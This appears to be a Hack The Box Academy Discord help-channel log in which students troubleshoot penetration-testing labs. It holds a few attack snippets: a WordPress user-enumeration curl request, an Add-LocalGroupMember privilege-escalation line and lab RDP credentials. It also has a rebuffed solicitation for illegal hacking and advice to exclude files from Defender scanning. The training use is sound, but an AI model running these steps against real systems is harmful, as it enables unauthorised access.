Hello, the payload in this section doesn't work, I don't know why, but it doesn't delete the user and doesn't display the share functionality once I've visited the page where I've inserted my paylaod https://academy.hackthebox.com/module/153/section/1450

How goes it people! Having issues with the Attacking Splunk lab from the Attacking Common Applications lab. I have followed all of the steps on both the AttackLab & my own parrot VM. I edited the inputs.conf, rev.py, run.ps1 files, started nc listener, made sure the IPs and ports were correct, uploaded the "updater.tar.gz" file, but nc never gets the connection. Gace is 30 -35 minuts and still nothing.

Hi Guys, I am stuck at Sliver C2 Skills Assessment. I got the administrator access on SRV09 and got the dbuser creds for DC02 and able to login through mssqlclient.py, but when i try to upload the pivot exe file to DC02 it is giving me an error, file not found. I feel some AV is blocking the connections. Can you pls point me the direction to move forward?

Any tips on this section "https://academy.hackthebox.com/module/54/section/490" I have been stuck on this for almost 24 hours?

I noticed some days the target boxes are sluggish. One day this week I was pulling my hair out because of this. The next day, the target boxes were flying. I think some days there is heavier network traffic than others.

Hi everyone, I’m currently stuck on the “Public Exploits” module in the Pentester path and could really use some help.

I’ve identified that the target is running WordPress 5.6.1 (via Nmap), and using Gobuster I discovered a /wp-admin login page. I was also able to enumerate a valid user with the following request:

curl -I http://94.237.59.174:58585/?author=1

However, I haven’t been able to gain shell access or locate the flag.txt yet. I feel like I might be overcomplicating the approach and would really appreciate any guidance or a nudge in the right direction—especially toward the path of least resistance.

Thanks in advance!

Maybe: visit the website

You might find something interesting

All I see is the wp-login and a getting started page

ah I found an idex

I am not seeing flag.txt in there.... but I am seeing alot of .php files

But to make my own php file and maybe use a reverse-php exploit I need to login to the console...

Did you try simply navigating to the website and looking around for a clue?

I did I found that the website is using a plugin called "Simple Backup Plugin 2.7.10 for WordPress"

With that I was able to find the flag using msfconsole 🙌

Is that "spoiling" too much?

Yes it is.

Deleted your post as it contained content from module above tier 0. That said, check your commands. You are missing at least one argument in one of your commands.

What did I say that was "spoiling" the module? So I can know in the future @cloud urchin @foggy monolith

You didn't

Ok good to know.

hello hello) I have same problem))

Best to ask for help with boxes in #boxes

post request

How long is it supposed to take to update? Because I tried with /add and still nothing, and that shouldn't matter as the instruction says to abuse GPOs to change an existing user's password, not to add a new user.

I believe the module covers that

you likely want to force it to happen immediately instead of waiting

Impatient much

it is quite a long time iirc 😛

or until reboot

Okay, that’s too long indeed. Force ittttt (sorry, off-topic)

gpupdate /force isn't doing anything either.

I could be remembering a different GPO attack. I think you just need to make sure you did all the steps correctly and it should work. I'm not seeing anything different than what they showed in the module in my notes.

I ended up finding a different path to the same result anyway. Had to go the add-already-compromised-user-as-local-admin route and chain that with the fact that local admins can change passwords of other users by default.

Hello, I am trying to solve the questions on https://academy.hackthebox.com/module/144/section/1257
I managed to run gobuster and get 4 subdomains: blog, admin, forum and support.
However, according to the question there should be one with "web" and one with "vm". And when I search this I see that people have more results than I do: https://forum.hackthebox.com/t/help-me-specialists-virtual-hosts-bruteforce/318049/22
Am I doing something wrong missing those records?

I changed my /etc/hosts file to have the "IP inlanefreight.htb" record, and this is the command I am running: gobuster vhost -u http://inlanefreight.htb:40525 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 10 --append-domain

i'm unable to spawn a target!!! it jusy loads and then shows click here to spawn one

Try pressing CTRL+SHIFT+R then try again

same again

how do you know when you didn't wait for it to spawn

as i click on the spawn button

it loads up

it can take 3-5 mins for an environment to fully spawn, you responded immediately

then again shows click to spawn target

try another browser

Target(s): Click here to spawn the target system! --->> Target(s): Target(s) are spawning... --->Target(s): Click here to spawn the target system!

I've been having the same problem for a few hours now

try another region maybe

@earnest anchor No. Not what this discord is about.

same here, different VPNs, different region

No target will spawn for me in the academy at the time of writing

are rdp sessions usually this unstable?

I'm getting DC'd every 15-20 second, on the Attacking Common Services module - section RDPf

[08:10:46:164] [55588:55589] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[08:10:46:164] [55588:55589] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[08:10:46:164] [55588:55589] [INFO][com.freerdp.client.common] - Network disconnect!

[08:11:04:337] [55614:55615] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[08:11:04:337] [55614:55615] [ERROR][com.freerdp.core] - failed to connect to 10.129.203.13

hi guys, is it possibile to have help on an active machine or is it against the rules? I'm stuck since yesterday, I just need a hint on injecting a command using burp repeater ffor obtaining a shell

Have a look at the channel list - you're in the wrong channel 😉

if its one of the 2 recent boxes, they have a dedicated channel, otherwise #boxes 😄

Sorry I dont use discord a lot I'm a little lost ahah, which is the dedicated channel? And the other thing u wrote I see "No access"

Link your account via the instructions provided in #welcome

then you'll get access

Saw your shield and thought you had your account linked 🙂

Thank u, yes now I see more channels

So I ask in boxes right?

yes please

20 minutes and still no rdp session -_-

Make sure your VPN is connected properly, the error messages state that it was unable to reach the target RDP service

Yeah im on vpn else I wouldnt be able to get onto the target for 15s 😛

contacted support, pwnbox is doing it too

Targets are not spawning for me as well. Quite a lot of problems lately.

Mhh I now changed to a different module and the targets are spawning. I was struggling with the pivoting module before.

indeed. Lot of money too

If you're having issues: reach out to support

Discord isn't an official mode of support

Bear in mind if it's a temp upstream issue, you may not be the only one reaching out

Hey guys, anyone have troubleshooting problem using vpn file ?

I tried to switching between multiple servers but the result stay the same

its been few days

htb-student@nix03:~$ alright
alright: command not found
htb-student@nix03:~$ Read from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

i still get this error

whats up man

contact support @rustic sage

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

ikr I just wonder if anyone have the same problem because I am not a newbie, I tried everything before asking actually.

is this of any help @digital ore ?https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting

thats the first one I tried, nope unfortunately

Are the machines in the "Attacking common services modules" working? Even nmap seems to not be working on the targets

yup I had to. So far no word but w/e its just tedious

You ever get help with this? I am also stuck here...

Nevermind. Hydra magically worked this morning. Probably operator error...

Hi! I’m working on parameter fuzzing with GET requests. Can anyone help me understand why it might not be showing any results? Thank you very much!

1. why are you using powershell
2. did the module give you a vhost/domain

1. I drag a wrong img.
2. yes "admin.academy.htb"

then maybe use the vhost/domain and not the IP 😉

Okay, thank you very much.

how can i hide hints here so no one can see it ?

until u click on it

[hide] blabla [/hide]

I'm currently working on "AD Enumeration & Attacks – Skills Assessment Part II." I've used Ligolo on the attack machine to forward traffic to my Kali machine, so I don't need to transfer tools directly. However, I'm having trouble getting any host on the internal network (172.16.7.x) to access my web server. This is preventing me from getting a Meterpreter shell and performing privilege escalation on SQL01.
The question I'm stuck on is:

"Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host."

I can log in to the SQL01 box with the credentials I found, but I need SYSTEM privileges to access the flag. I know the route and the PE method, but I just can't get the target to connect back to my machine.

Could outbound traffic be blocked by a firewall appliance? I looked at a walkthrough, and the author was able to use certutil and PowerShell to get a reverse shell via SOCKS after port forwarding with Chisel.

I find proxychains annoying and only use it when absolutely necessary—both in labs and at work.

Also, I when I RDP into the attack machine I can't connect a share when I use xfreerdp so I can use my own tools. It seems like outbound traffic is blocked on certain ports.

All inbound SMB, MSSQL and web from the attack machine to my kali machine works, However connecting a samba share from my kali machine to the attack machine doesn't work.

Can someone assist?

if it would be a spoiler; i suggest not posting and still redacting; || text || is spoiler text, but it's heavily discouraged to just paste spoilers within that block as anyone can still see it

Outbout web from attack to kali works -

Ligolo works -

I am havin hard time in solving Question 4 and 5 from Information Gathering - Web Edition section . I have installed reconsipider and trying to get past this error but doesnt seem to work. Is anyone having a similar issue. This was not working and hence have tried finalrecon as well but it doesnt give me any answers to these questions. Can someone help me here please

Ok so am in password attack - Hard lap ..
|| I crack the smb service with user given and I find the pas and login . After I find a username I try to do the same with mutated password list I did it for long time more then 30 min .. nothing found .. I am thinking to crack it with the rockyou.txt ? ||

Inbound works -

Is there a problem with the vpns? I downloaded several from different regions but it's still not working. Have to use Pwnbox for the moment

So, here's a friendly FYI for students: If you're using port forwarding—regardless of the method—it seems that any outbound traffic from your attack box (Parrot, in my case) to your Kali machine (or whatever flavor of Linux you're using) may be blocked. It's likely due to a firewall appliance or AWS forwarding rules.

define not working

do you have some logs?

Hi

Yeah. Here is this. Thanks

perhaps a firewall issue?

This looks connected to the vpn

redownload the vpn package may help

I can't even ping the target nor access them.

can someone help me fo ra sec lol... IM doing a lab sim running hashcat and it tells me to run "passwords.txt" as my wordlist. Is that literally the file name or just a placeholder?

I've already done that, not working

I feel really dumb for asking sorry

Contact the support peeps. Not in here support but the hive mind then contact support

Thanks man

lol, sorry showing my age. my parents used to watch that dude

I got cha

?

Do you have scrapy installed?

no

Also which section of the module is this? The skills assessment at the end?

It's probably the Ace type from Powerview

reminder not to reveal information from modules above tier 0

as it's considered a spoiler

sorry...

Can we use spoiler tags?

spoiler tags don't do shit

as anyone can still click on them

Okay, just asking yikes.

if you utilize spoiler tags, still redact information

it wasn't meant as an attack on you; just my general thing about spoiler tags

Fun fact:
If you include the php script of "module 160 - web services & API attacks - arbitrary file upload" into a code environment inside an obsidian note, then windows defender says weee wooo wee wooo and deletes the whole obsidian note. rip notes to api attacks (not that it were many)

not to mention you can just as easily turn hiding spoiler tags off in your client settings

I know, only kidding 😉

this is why you add your note vault to the defender exclusion list

that way defender doesn't even look at it

yes, just learned the hard way 🙂

I haven't been on here in a while forgot about that. I deleted my posts for certain posts.

because defender doesn't care if it's actively being used, just that it's valid code text that can be malicious

it doesn't really read the file extension

can anyone help me? What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) -- Active Directory Enumeration & Attacks

the format tells you it's Word-Word not WordWord

Working now. It had something to do with my Bitdefender. Had to put the VM in bridged adapter

also it's not a generic permission

the Get-DomainObjectACL command should be what you need

I seem to not be able to run this command, says passwords.txt wordlist doesnt exist in this directory. I search the wordlists directory and can not find anything on this. Am I missing something lol

anyone struggling with the case#7 flag in sqlmap module?

It means password.txt does not exist in the directory you’re in. You should have a valid password.txt wordlist file if you wanna run the cmd.

ill look around some more..

but thank you!

if you didn't already; check if the module has a resources button for you to download the wordlists from

yeah I see nothing on that, but I just ran the command "locate passwords.txt" and there is no just "password.txt"

in the soc analyst path module Windows Attack & Defense

kerberoasting

either that or the cheatsheet is being generic

such that you'd replace <passwords.txt> with a valid path to a password file

like rockyou.txt or something

which shows that passwords.txt is an actual file I am assuming

sorry

please don't share images from the walkthrough :)

mb

if they're referencing a passwords.txt file, then you likely were instructed to download/a link was given at some point

if it was a seclists password list they would have given you the full path

yeah... uhhh... ill look some more..

hey friend

click the hint button next to the question

:)

omfg

why is that a freaking hint lol

im raging xd

feel free to leave /feedback (and/or drop in #1234357888114364508 ) if you feel they need to make it clearer

thanks lol

but as a general note: if no wordlist is provided or instructed to create, assume rockyou.txt

thanks!

Hi, please help with Applications of AI in InfoSec assessment part , my code not give right result while upload 😦

ow

do not share screenshots of modules above tier 0

sorry

:)))

help pls? Is it because of file permission?

Which module did you need help with?

did you add the file extension to the list?

:)

ow haha

i suggest trying to complete the rest of the module blind; as AEN is completely doable without reading the module content or questions

@mortal basin ICS pentesting modules too please 😭

thank you

get domain compromise then go back to answer the questions

Hi, I need some help, stuck in module "Pentest in a Nutshell", section "Windows Privilege Escalation", I added the Add-LocalGroupMember -Group "Administrators" -Member "WIN01\john" string to the backupprep.ps1 script, I see *Administrators in Local Group Memberships for "net user john" but I still cannot access the Administrator folder, I get an error "Access Denied", but according to the module, I should be able to access it

log out and log back in or force the GPO update

closing the RDP session is NOT logging out

Thanks for response, but it didn't help me. I executed command gpupdate /force in cmd, but I still have no permission to access Administrator folder. And I don't see a log out option in RDP, only Disconnect that closes the session

start menu -> log off/disconnect

I got it! Thank you so much for help ♥️

Hi all, does anyone have performance issues? I am running a redis-cli -h <target-ip> command and it's takinf me forever. Can anyone help?

What module is this for?

Im currently starting out my HTB journey with Meow but it seems my Target isnt getting online because I cant even ping it let alone get my root flag

Anyone can help me out?

read and follow #welcome then you can access #starting-point ; Meow is a starting-point machine, not an academy module. If you're having issues make sure you're connected to the proper vpn, contact support if you're continuing to have issues after that

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

You need to link your discord with your htb account

https://academy.hackthebox.com/module/112/section/1079
Footprinting Lab - Medium
Footprinting
I cant seem the user to for the one question

Hi guys, I am doing the pivoting and tunneling module and doing the SocksOverRDP section. Thing is once i have uploaded the socks over rpd and unzip it, before i can load the dll it just gets deleted after a few seconds??? has this happened to anyone else?

Disable real-time protection

it looks like it’s already off?

not off unless you turned it off

sounds like it's not if it's deleting the .dll file

hello

Hi, welcome. Please read the #rules and follow the instructions in #welcome to gain access to most of the server.

i was looking in the wrong place for it, thanks

Good evening guys someone hast completed the module AI?

Which one

skilss assessment

applications of AI in Infosec

Hello can someone please help me with XSS module "phishing?" I have created a working XSS payload, verified the listening was workiing correctly but still when I paste it into the url to send to the victim I do not get any credentials

Hey, guys I am doing AD Enumeration & Attacks - Skills Assessment Part I the msfconsole has been stuck here for like 10minutes:

Dm the xss payload, you are probably missing something

Are you sure of your payload? Because metasploit is having trouble connecting

Hi I am on Windows Privilege escalation module - Skills Assessment - Part I. without giving too much away, I managed to get into the server and answer Q1, but when trying to priv esc for Q2 and beyond it was not working I tried Juicy P, but the nc wouldn't call back. my machine session ended but I was lost anyway. I have attached a screenshot whenever I tried in the directory with .\ it would just error but below just wouldn't catch anything I tried modifying my shell.exe a few times to see if that was the issue. a nudge would be appreciated, thanks.

Are you supposed to listen to a port from your attacking machine?

It's a web shell I have to upload a payload and start it previously it worked but idk why it's stuck now

Maybe it's a problem with the machine let me try launching it again

If it is the same payload and it worked before then it has to be a connection issue

Yea, I tried old and new payload both same issue presists

same issue even after restarting the machine

Did you restart the target as well? Cause the ip is still the same

yes

Introduction to Windows Evasion Techniques - The VM's don't have Visual Studio? I can't find it installed.

any luck?

You can't do any of the questions without a compiler installed. Visual Studio is not there nor is C:\tools

problem with target only keep's crashing

yeh I figured, what is your conection? UDP?

yep tried changing vpn's also udp and tpc tried both same keep's crashing

have you tried using the pwnbox instead of vpn?

I have never used pwnbox in my life

It is weekend bro, try some of that new stuff

let me try

no weekend for me my coaching is still on saturday and sunday

lol

There is in the testing VM

The target doesn’t

let me know if it works, the pwnbox is really easy to use just make sure to use the clipboard icon when coping and pasting

Yep testing that

and try to ping the target first before starting the attack to make sure it is reachable

yep it's reachable I am testing the payload now

Working fine with pwnbox I dont know what's my machines problem

Could be HTB issue or the ISP firewall

yea, Let me test with a new vpn

what about the full path?

Is it possible for you to finish the challenge using the pwnbox?

I dont think soo I have to do port forwarding and everything but yea I can try

anyways thanks man

best of luck, keep it up man. It is those weekends that count

Thanks a lot

Someone has German htb server?

yeh

Captive Portal - MAC Spoofing

I have done the airmon-ng command but when i do the airodump-ng command, I get no output. Would someone mind giving me a nudge with that one?

@safe mango got it to work just launched new machine in another module and then launched in my assesment it worked

Yes scrappy is installed. This is the skill assessment section at the end of the module.

How can we fix that? I am on ad skill assessment 1

Guys, I don't understand this module Windows Event Logs & Finding Evil. is there a video explaining? what is written is so bad in this module make me confuse?

it's a lot easier to understand than some of the Microsoft documentation

Never read the win_api docs, or the c++ std declarations

hey, on AD Enumeration & Attacks - Skills Assessment Part II question 4 , when looking at "show solution" it never explains why it used that password against the || kerbrute_windows passwordspray || i checked resources and that is just a list of tools. i am unclear as to how anyone would get that specific password, ending in a 1.

I believe there might be a bug in Local File Inclusion as I am unable to do any of the exploits within the module and therefore cannot answer the questions

that password is used in the earlier sections that explain and demonstrate password spraying, and it is introduced as a 'common password', probably because it meets the typical complexity requirements (8 characters, alphanumeric) and makes sense as a password set by an administrator for a new user

I guess they just expect you to use/repeat what was showed in these earlier sections for the skills assessment, because I don't think there is any other way you can obtain this password other than trying wordlists

ok, thanks. that sort of crossed my mind, but it was never explained, thus i couldn't figure out if i was missing a password list or something. i appreciate your help on that!

you can put a post in #1234357888114364508 if youre sure its a bug

Thank you!

i also suggest restarting the target

There are a couple of commonly used passwords

You will see throughout some of the modules these common passwords being attempted

Or a custom wordlist with some logical passwords for that target

Anyone know why the certify sliver command doesnt work ?

Hello

I know -- u find a more useful thing to do

What?

U just landed in the most pivotal place in ur life

U can now learn hacking if u want instead of wasting ur time capturing selfies

So?

Now its time to open the Domain Controllers account and make stacks hacking legally

Legally?

Unless u wanna live eating xanax instead of food and walking around with a hood on forever

With Fullz And Etc

Anybody ??

Wrong type of server, read #rules no. 4

Shi

So What Is This Grohp

Group Abt

??

#welcome

So U Dont Know How To Hack?

Those commands are so hit or miss

Can u pls share if there's a mindset to keep my sliver efforts consistent ?

Should I only use external binaries and proxies?

This is not that kind of server, we strive to be ETHICAL here. please stop asking

im not sure what the problem is tbh, some labs its completely fine and others i get that error

execute-assembly might be more consistent but its been a while

Am i tripping, or in the Attacking SQL Databases module i have to alternate between 2 clients.
For example:
|| I have to use mssqlclient.py to send the hash, and then use sqlcmd to login with the mssqlsvc. Because i could not connect to my pwnbox share using sqlcmd, but i also cant log in as the svc account in mssqlclient.py. Not sure if this is normal and theres logic behind it but it messed with my brain for a bit||

Skill issue, just use nxc , nahh in all seriousness those tools and that lab is a bit old so yeah it's common to have issues

lmao, i will forever hate databases

Keep in mind the exploits for em though, never know when you need an xp_dirtree responder combo

yeah true

Any idea @safe star

Works with normal single un-encoded command

• but doesnt work with base64 command which includes flags

I think im gonna give up on sharpsh

looks like the port is different

Thanks very much

im very frustrated with the ldap module asking how many users exist in the domain. Ive put every logical value in and it isnt working

Ive tried filtered by enabled, human names, permissions, etc the question just asks users and according to AD ive provided all "users"

and also u can use Get-WmiObject -Namespace "root\cimv2" -Class Win32_UserAccount

Hi Guys, for the Advanced SQL Injection Skills Assessment I am struggling to generate right Reset Key (and to crack the password hash that I dumped), is there something that I am missing? Thank you in advance! 🙂

so i was trying the top one. it appears only the bottom one is correct

evidently aduser doesnt count 5 of the users

thank you very much

get-ADobject works for computer.count and group.count but not user.count

Any idea why sharpview doesnt work here

[*] sharpview output:
Parsing Error SPN: | is not a valid value for Boolean.
[Get-DomainSearcher] search base: LDAP://DC=child,DC=htb,DC=local
[Get-DomainUser] filter string: (&(samAccountType=805306368))
An error occurred: 'System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.DirectoryServices.DirectoryServicesCOMException: An operations error occurred.

   at System.DirectoryServices.DirectoryEntry.Bind(Boolean throwIfFail)
   at System.DirectoryServices.DirectoryEntry.Bind()
   at System.DirectoryServices.DirectoryEntry.get_AdsObject()
   at System.DirectoryServices.DirectorySearcher.FindAll(Boolean findMoreThanOne)
   at SharpView.PowerView.Get_DomainUser(Args_Get_DomainUser args)
   --- End of inner exception stack trace ---
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
   at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
   at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at SharpView.Program.Run(String[] args)
   at SharpView.Program.Main(String[] args)'```

I'm almost done with bug bounty hunting, I must say the session security module is very underwhelming

Just spend a lot of time copy pasting payloads that aren't really explained, and the questions don't really ensure you understand anything

The rest of the course was much much better

Well at least those payloads work

😂

7/10 of the commands used in the sliver module are outdated

But that being said I don't really need all 10

I have officially tried all of these commands to perform a simple sweep of kerberoastable SPNs and none of them worked (almost 15 methods)

Keep getting this error

it might just be that lab tbh, i think it was working somewhat on the skill assessment

Hi I am having issues with Linux privesc skills assesment - client_loop: send disconnect: Broken pipe on ssh just after few seconds of login.
Can someone help me with it or verify it are you facing this? Because its really annoying I have tried changing my vpn file , using pwnbox , stabilising the shell , getting a revshell from the ssh and changing internet but still its the same everytime.

Hi Guys, for the Advanced SQL Injection Skills Assessment for the RCE Part I located the SQLi and I am able to perform SLEEP functions, etc. I was able to achieve RCE locally but it seems that in the lab user doesn't have the permission to use COPY Command. I tried using Large Object for the file upload but I wasn't able to do much that way either, is there something I am missing? Thank you! 🙂

Hello Guys,
I'm now at the "Vulnerability Assessment" module and ask me whether Nessus scan will be come in the CPTS exam?

or is that just for the pentester job in future important

Anything in the course can return during the exam. Telling yes or no will spoil the exam

hey, i just finished the Active Directory Enumeration & attacks module, is it recommended to do the the Active Directory Bloodhound module?

Hey, im currently stuck in the statics detections part of the defender evasion because the flag is not appearing, any idea why or what to do? 🙂

"After placing the file, wait up to a minute; if all checks pass, the file "C:\Alpha\Static\flag.txt" will be created, containing the flag."

i can`t connect with user(sql_dev),

i can use htb-student, but if i use sql_dev, i can't connect

xfreerdp /v:<target ip> /u:sql_dev

which module is this?

Windows Privilege Escalation

try rdesktop instead of xfreerdp

I think that account doesn't have the necessary permissions.

hlo their i hav a proplm

im on attacking common services hard lab

ive got 3 valid credentials

however i cant log in to RDP or RPC with any of them

so ive (like usual ) run to a write up

the guy logged in to RDP with one of the users using rdesktop

if you can afford 500 cubes go for it

however xfreerdp and rdesktop both failed at me

xfreerdp produces some errors

and rdesktop freezes on black display

Please share the error I might be able to help

though xfreerdp worked good befoere

└─$ xfreerdp /v:10.129.234.162 /u:J*** /p:'*************'                                                                             
[12:48:51:696] [156108:156109] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack pos
ition 0                                                                                                                                 
[12:48:51:696] [156108:156109] [WARN][com.freerdp.crypto] - CN = WIN-HARD                                                               
[12:48:53:704] [156108:156109] [ERROR][com.freerdp.core] - transport_ssl_cb:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_CERTAINLY_EXPI
RED [0x0002000F]                                                                                                                        
[12:48:53:704] [156108:156109] [ERROR][com.freerdp.core.transport] - BIO_read returned an error: error:0A000438:SSL routines::tlsv1 aler
t internal error                                                                                                                        

ah wait credentials exposed

Yea

Use xfreerdp to access the system via RDP. If you face black screen issues, use the following VPN fix:
sudo openvpn --config ~/Downloads/academy-regular.ovpn --mssfix 1200 --tun-mtu 1500
Now use:
xfreerdp3 /v:172.16.5.35 /u:mlefay /p:'Plain Human work!' /timeout:60000 /dynamic-resolution
🧠 Why this works:
The --mssfix 1200 and --tun-mtu 1500 prevent fragmentation of large packets over VPN, which is a common cause of black screens in RDP.

try this method

black screen was on rdesktop

ill try tho

press enter I don't suggest rdesktop it doesnt support NLM authentication

└─$ xfreerdp /v:10.129.234.162 /u:f**** /p:'************'
[13:28:03:360] [160007:160008] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[13:28:03:360] [160007:160008] [WARN][com.freerdp.crypto] - CN = WIN-HARD
[13:28:12:381] [160007:160008] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[13:28:12:384] [160007:160007] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

same same

oh wait

try this

theres a 3 here hmm

oo might be a typo verify

theres an xfreerdp3 package tho i dont have it

does that proof its an error on my eend ?

also

what is this ip

its not for academy bruh

Has anyone done the 2nd challenge of the Wi-Fi Evil Twin Attacks Skill Assessment?

I thought it had to be a collision event to disconnect the client from the WPA3 network and then Wifiphisher Plugin Update Phishing to trigger the reverse shell download and execution but it doesn't seem to work. Am I on the right track?

deleted your message cos it contained spoilers for a skill assessment

Yes you are

Any chance you can give me a little hint on what I'm doing wrong? I feel like I've tried every variation I can think of.

Please DM to not spoil for others

Done

huh? sorry for late reply but did you manage to fix it?

nope

I had to leave home

Have you tried remmina?

I'm am unable to get any flag 🙂

Please re check if you are connecting to the right ip run Nmap against rdp port and check

lucky.php
it truly is about getting lucky, spamming the button until you get it

hey guys, I'm in Skills Assessment for Windows Event Logs & Finding Evil, which i don't understand how to answer those question? I'm completely lost.

can someone help
module (Linux privesc > Container)
This command lxc exec {container} /bin/bash
gives -> Error: Command not found

the way to answer the questions is using the knowledge you gained throughout the module

i'm assuming you're replacing {container} with the container name; as {} is brace expansion

obv i did replace i just hided coz i thought i might be giving spoilers lmao

just being sure, because some people do forget

sorry if i sounded rude marcie